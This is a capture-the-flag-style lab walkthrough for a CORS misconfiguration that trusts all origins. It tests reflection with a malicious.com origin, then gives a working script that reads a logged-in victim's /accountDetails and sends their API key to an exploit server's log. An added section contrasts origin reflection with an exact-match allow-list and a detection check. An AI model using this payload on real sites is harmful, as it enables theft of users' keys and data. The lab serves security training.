CORS stands for Cross-Origin Resource Sharing. It is a mechanism that allows web browsers to make requests to a different domain than the one serving the original web page. This mechanism is enforced by the browser to mitigate potential security risks associated with cross-origin requests.
Lab description:
This website has an insecure CORS configuration in that it trusts all origins. To solve the lab, craft some JavaScript that uses CORS to retrieve the administrator’s API key and upload the code to your exploit server. The lab is solved when you successfully submit the administrator’s API key.
You can log in to your own account using the following credentials: wiener:peter
Steps:
Access the lab and log in to the application using the credentials wiener:peter.
Review the proxy history in Burp Suite and observe that your key is retrieved via an AJAX request to /accountDetails, and that the response contains the Access-Control-Allow-Credentials header, suggesting that it may support CORS.
We can see that Access-Control-Allow-Credentials: true is present. Let's duplicate this request, change the Origin header to something like Origin: https://malicious.com, and see whether this value is reflected. The resulting response will be something like this:
The Origin set in the request headers is present in the Access-Control-Allow-Origin response header, which confirms that this request has a CORS vulnerability.
Now go to the exploit server and enter the following payload, with your own lab ID in the URL:
<script>
var xhr = new XMLHttpRequest();
var url = "https://0a4e00fb047fe7c9819d8af100a0007e.web-security-academy.net";
xhr.onreadystatechange = function() {
    if (xhr.readyState == XMLHttpRequest.DONE) {
        fetch("/log?key=" + xhr.responseText);
    }
};
xhr.open('GET', url + "/accountDetails", true);
xhr.withCredentials = true;
xhr.send(null);
</script>
Deliver the exploit to the victim and observe the administrator's API key in the access log.
Then check the access log to get the victim's API key, and submit the key as the solution to solve the lab.
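The server-side side of the Origin reflection confirmed in the steps above, as an added example that is not part of the original write-up or the lab's code: it puts the reflecting behaviour next to an exact-match allow-list and includes a check that flags the weak configuration. The function names, TRUSTED_ORIGINS and https://app.example.com are assumptions made for illustration.

```javascript
// Added example (not from the lab): CORS header selection for a credentialed
// endpoint such as /accountDetails. All names and origins are constructed.

// Weak: mirrors whatever Origin the client sent, which is the behaviour the
// Origin: https://malicious.com test in the steps above reveals.
function reflectingCorsHeaders(requestOrigin) {
  if (!requestOrigin) return {};
  return {
    'Access-Control-Allow-Origin': requestOrigin,
    'Access-Control-Allow-Credentials': 'true',
  };
}

// Hardened: exact-match allow-list of full origins (scheme + host + port).
const TRUSTED_ORIGINS = new Set(['https://app.example.com']); // assumed value

function allowlistCorsHeaders(requestOrigin, trusted = TRUSTED_ORIGINS) {
  // Vary: Origin keeps caches from serving one origin's response to another.
  const headers = { Vary: 'Origin' };
  if (typeof requestOrigin !== 'string' || !trusted.has(requestOrigin)) {
    return headers; // no ACAO header: the browser blocks the cross-origin read
  }
  headers['Access-Control-Allow-Origin'] = requestOrigin;
  headers['Access-Control-Allow-Credentials'] = 'true';
  return headers;
}

// Config-review check: probe with an origin you do not trust and flag the
// response if that origin is echoed back together with credentials support.
function trustsArbitraryOrigin(probeOrigin, responseHeaders) {
  const h = {};
  for (const [k, v] of Object.entries(responseHeaders)) h[k.toLowerCase()] = v;
  return h['access-control-allow-origin'] === probeOrigin &&
    String(h['access-control-allow-credentials']).toLowerCase() === 'true';
}

const probe = 'https://malicious.com'; // same test origin as in the steps above
console.log('reflecting:', trustsArbitraryOrigin(probe, reflectingCorsHeaders(probe)));
console.log('allow-list:', trustsArbitraryOrigin(probe, allowlistCorsHeaders(probe)));
```

Exact string comparison is deliberate: prefix, suffix or substring matching on the Origin value would accept look-alike hosts, and the literal origin "null" is never in the set.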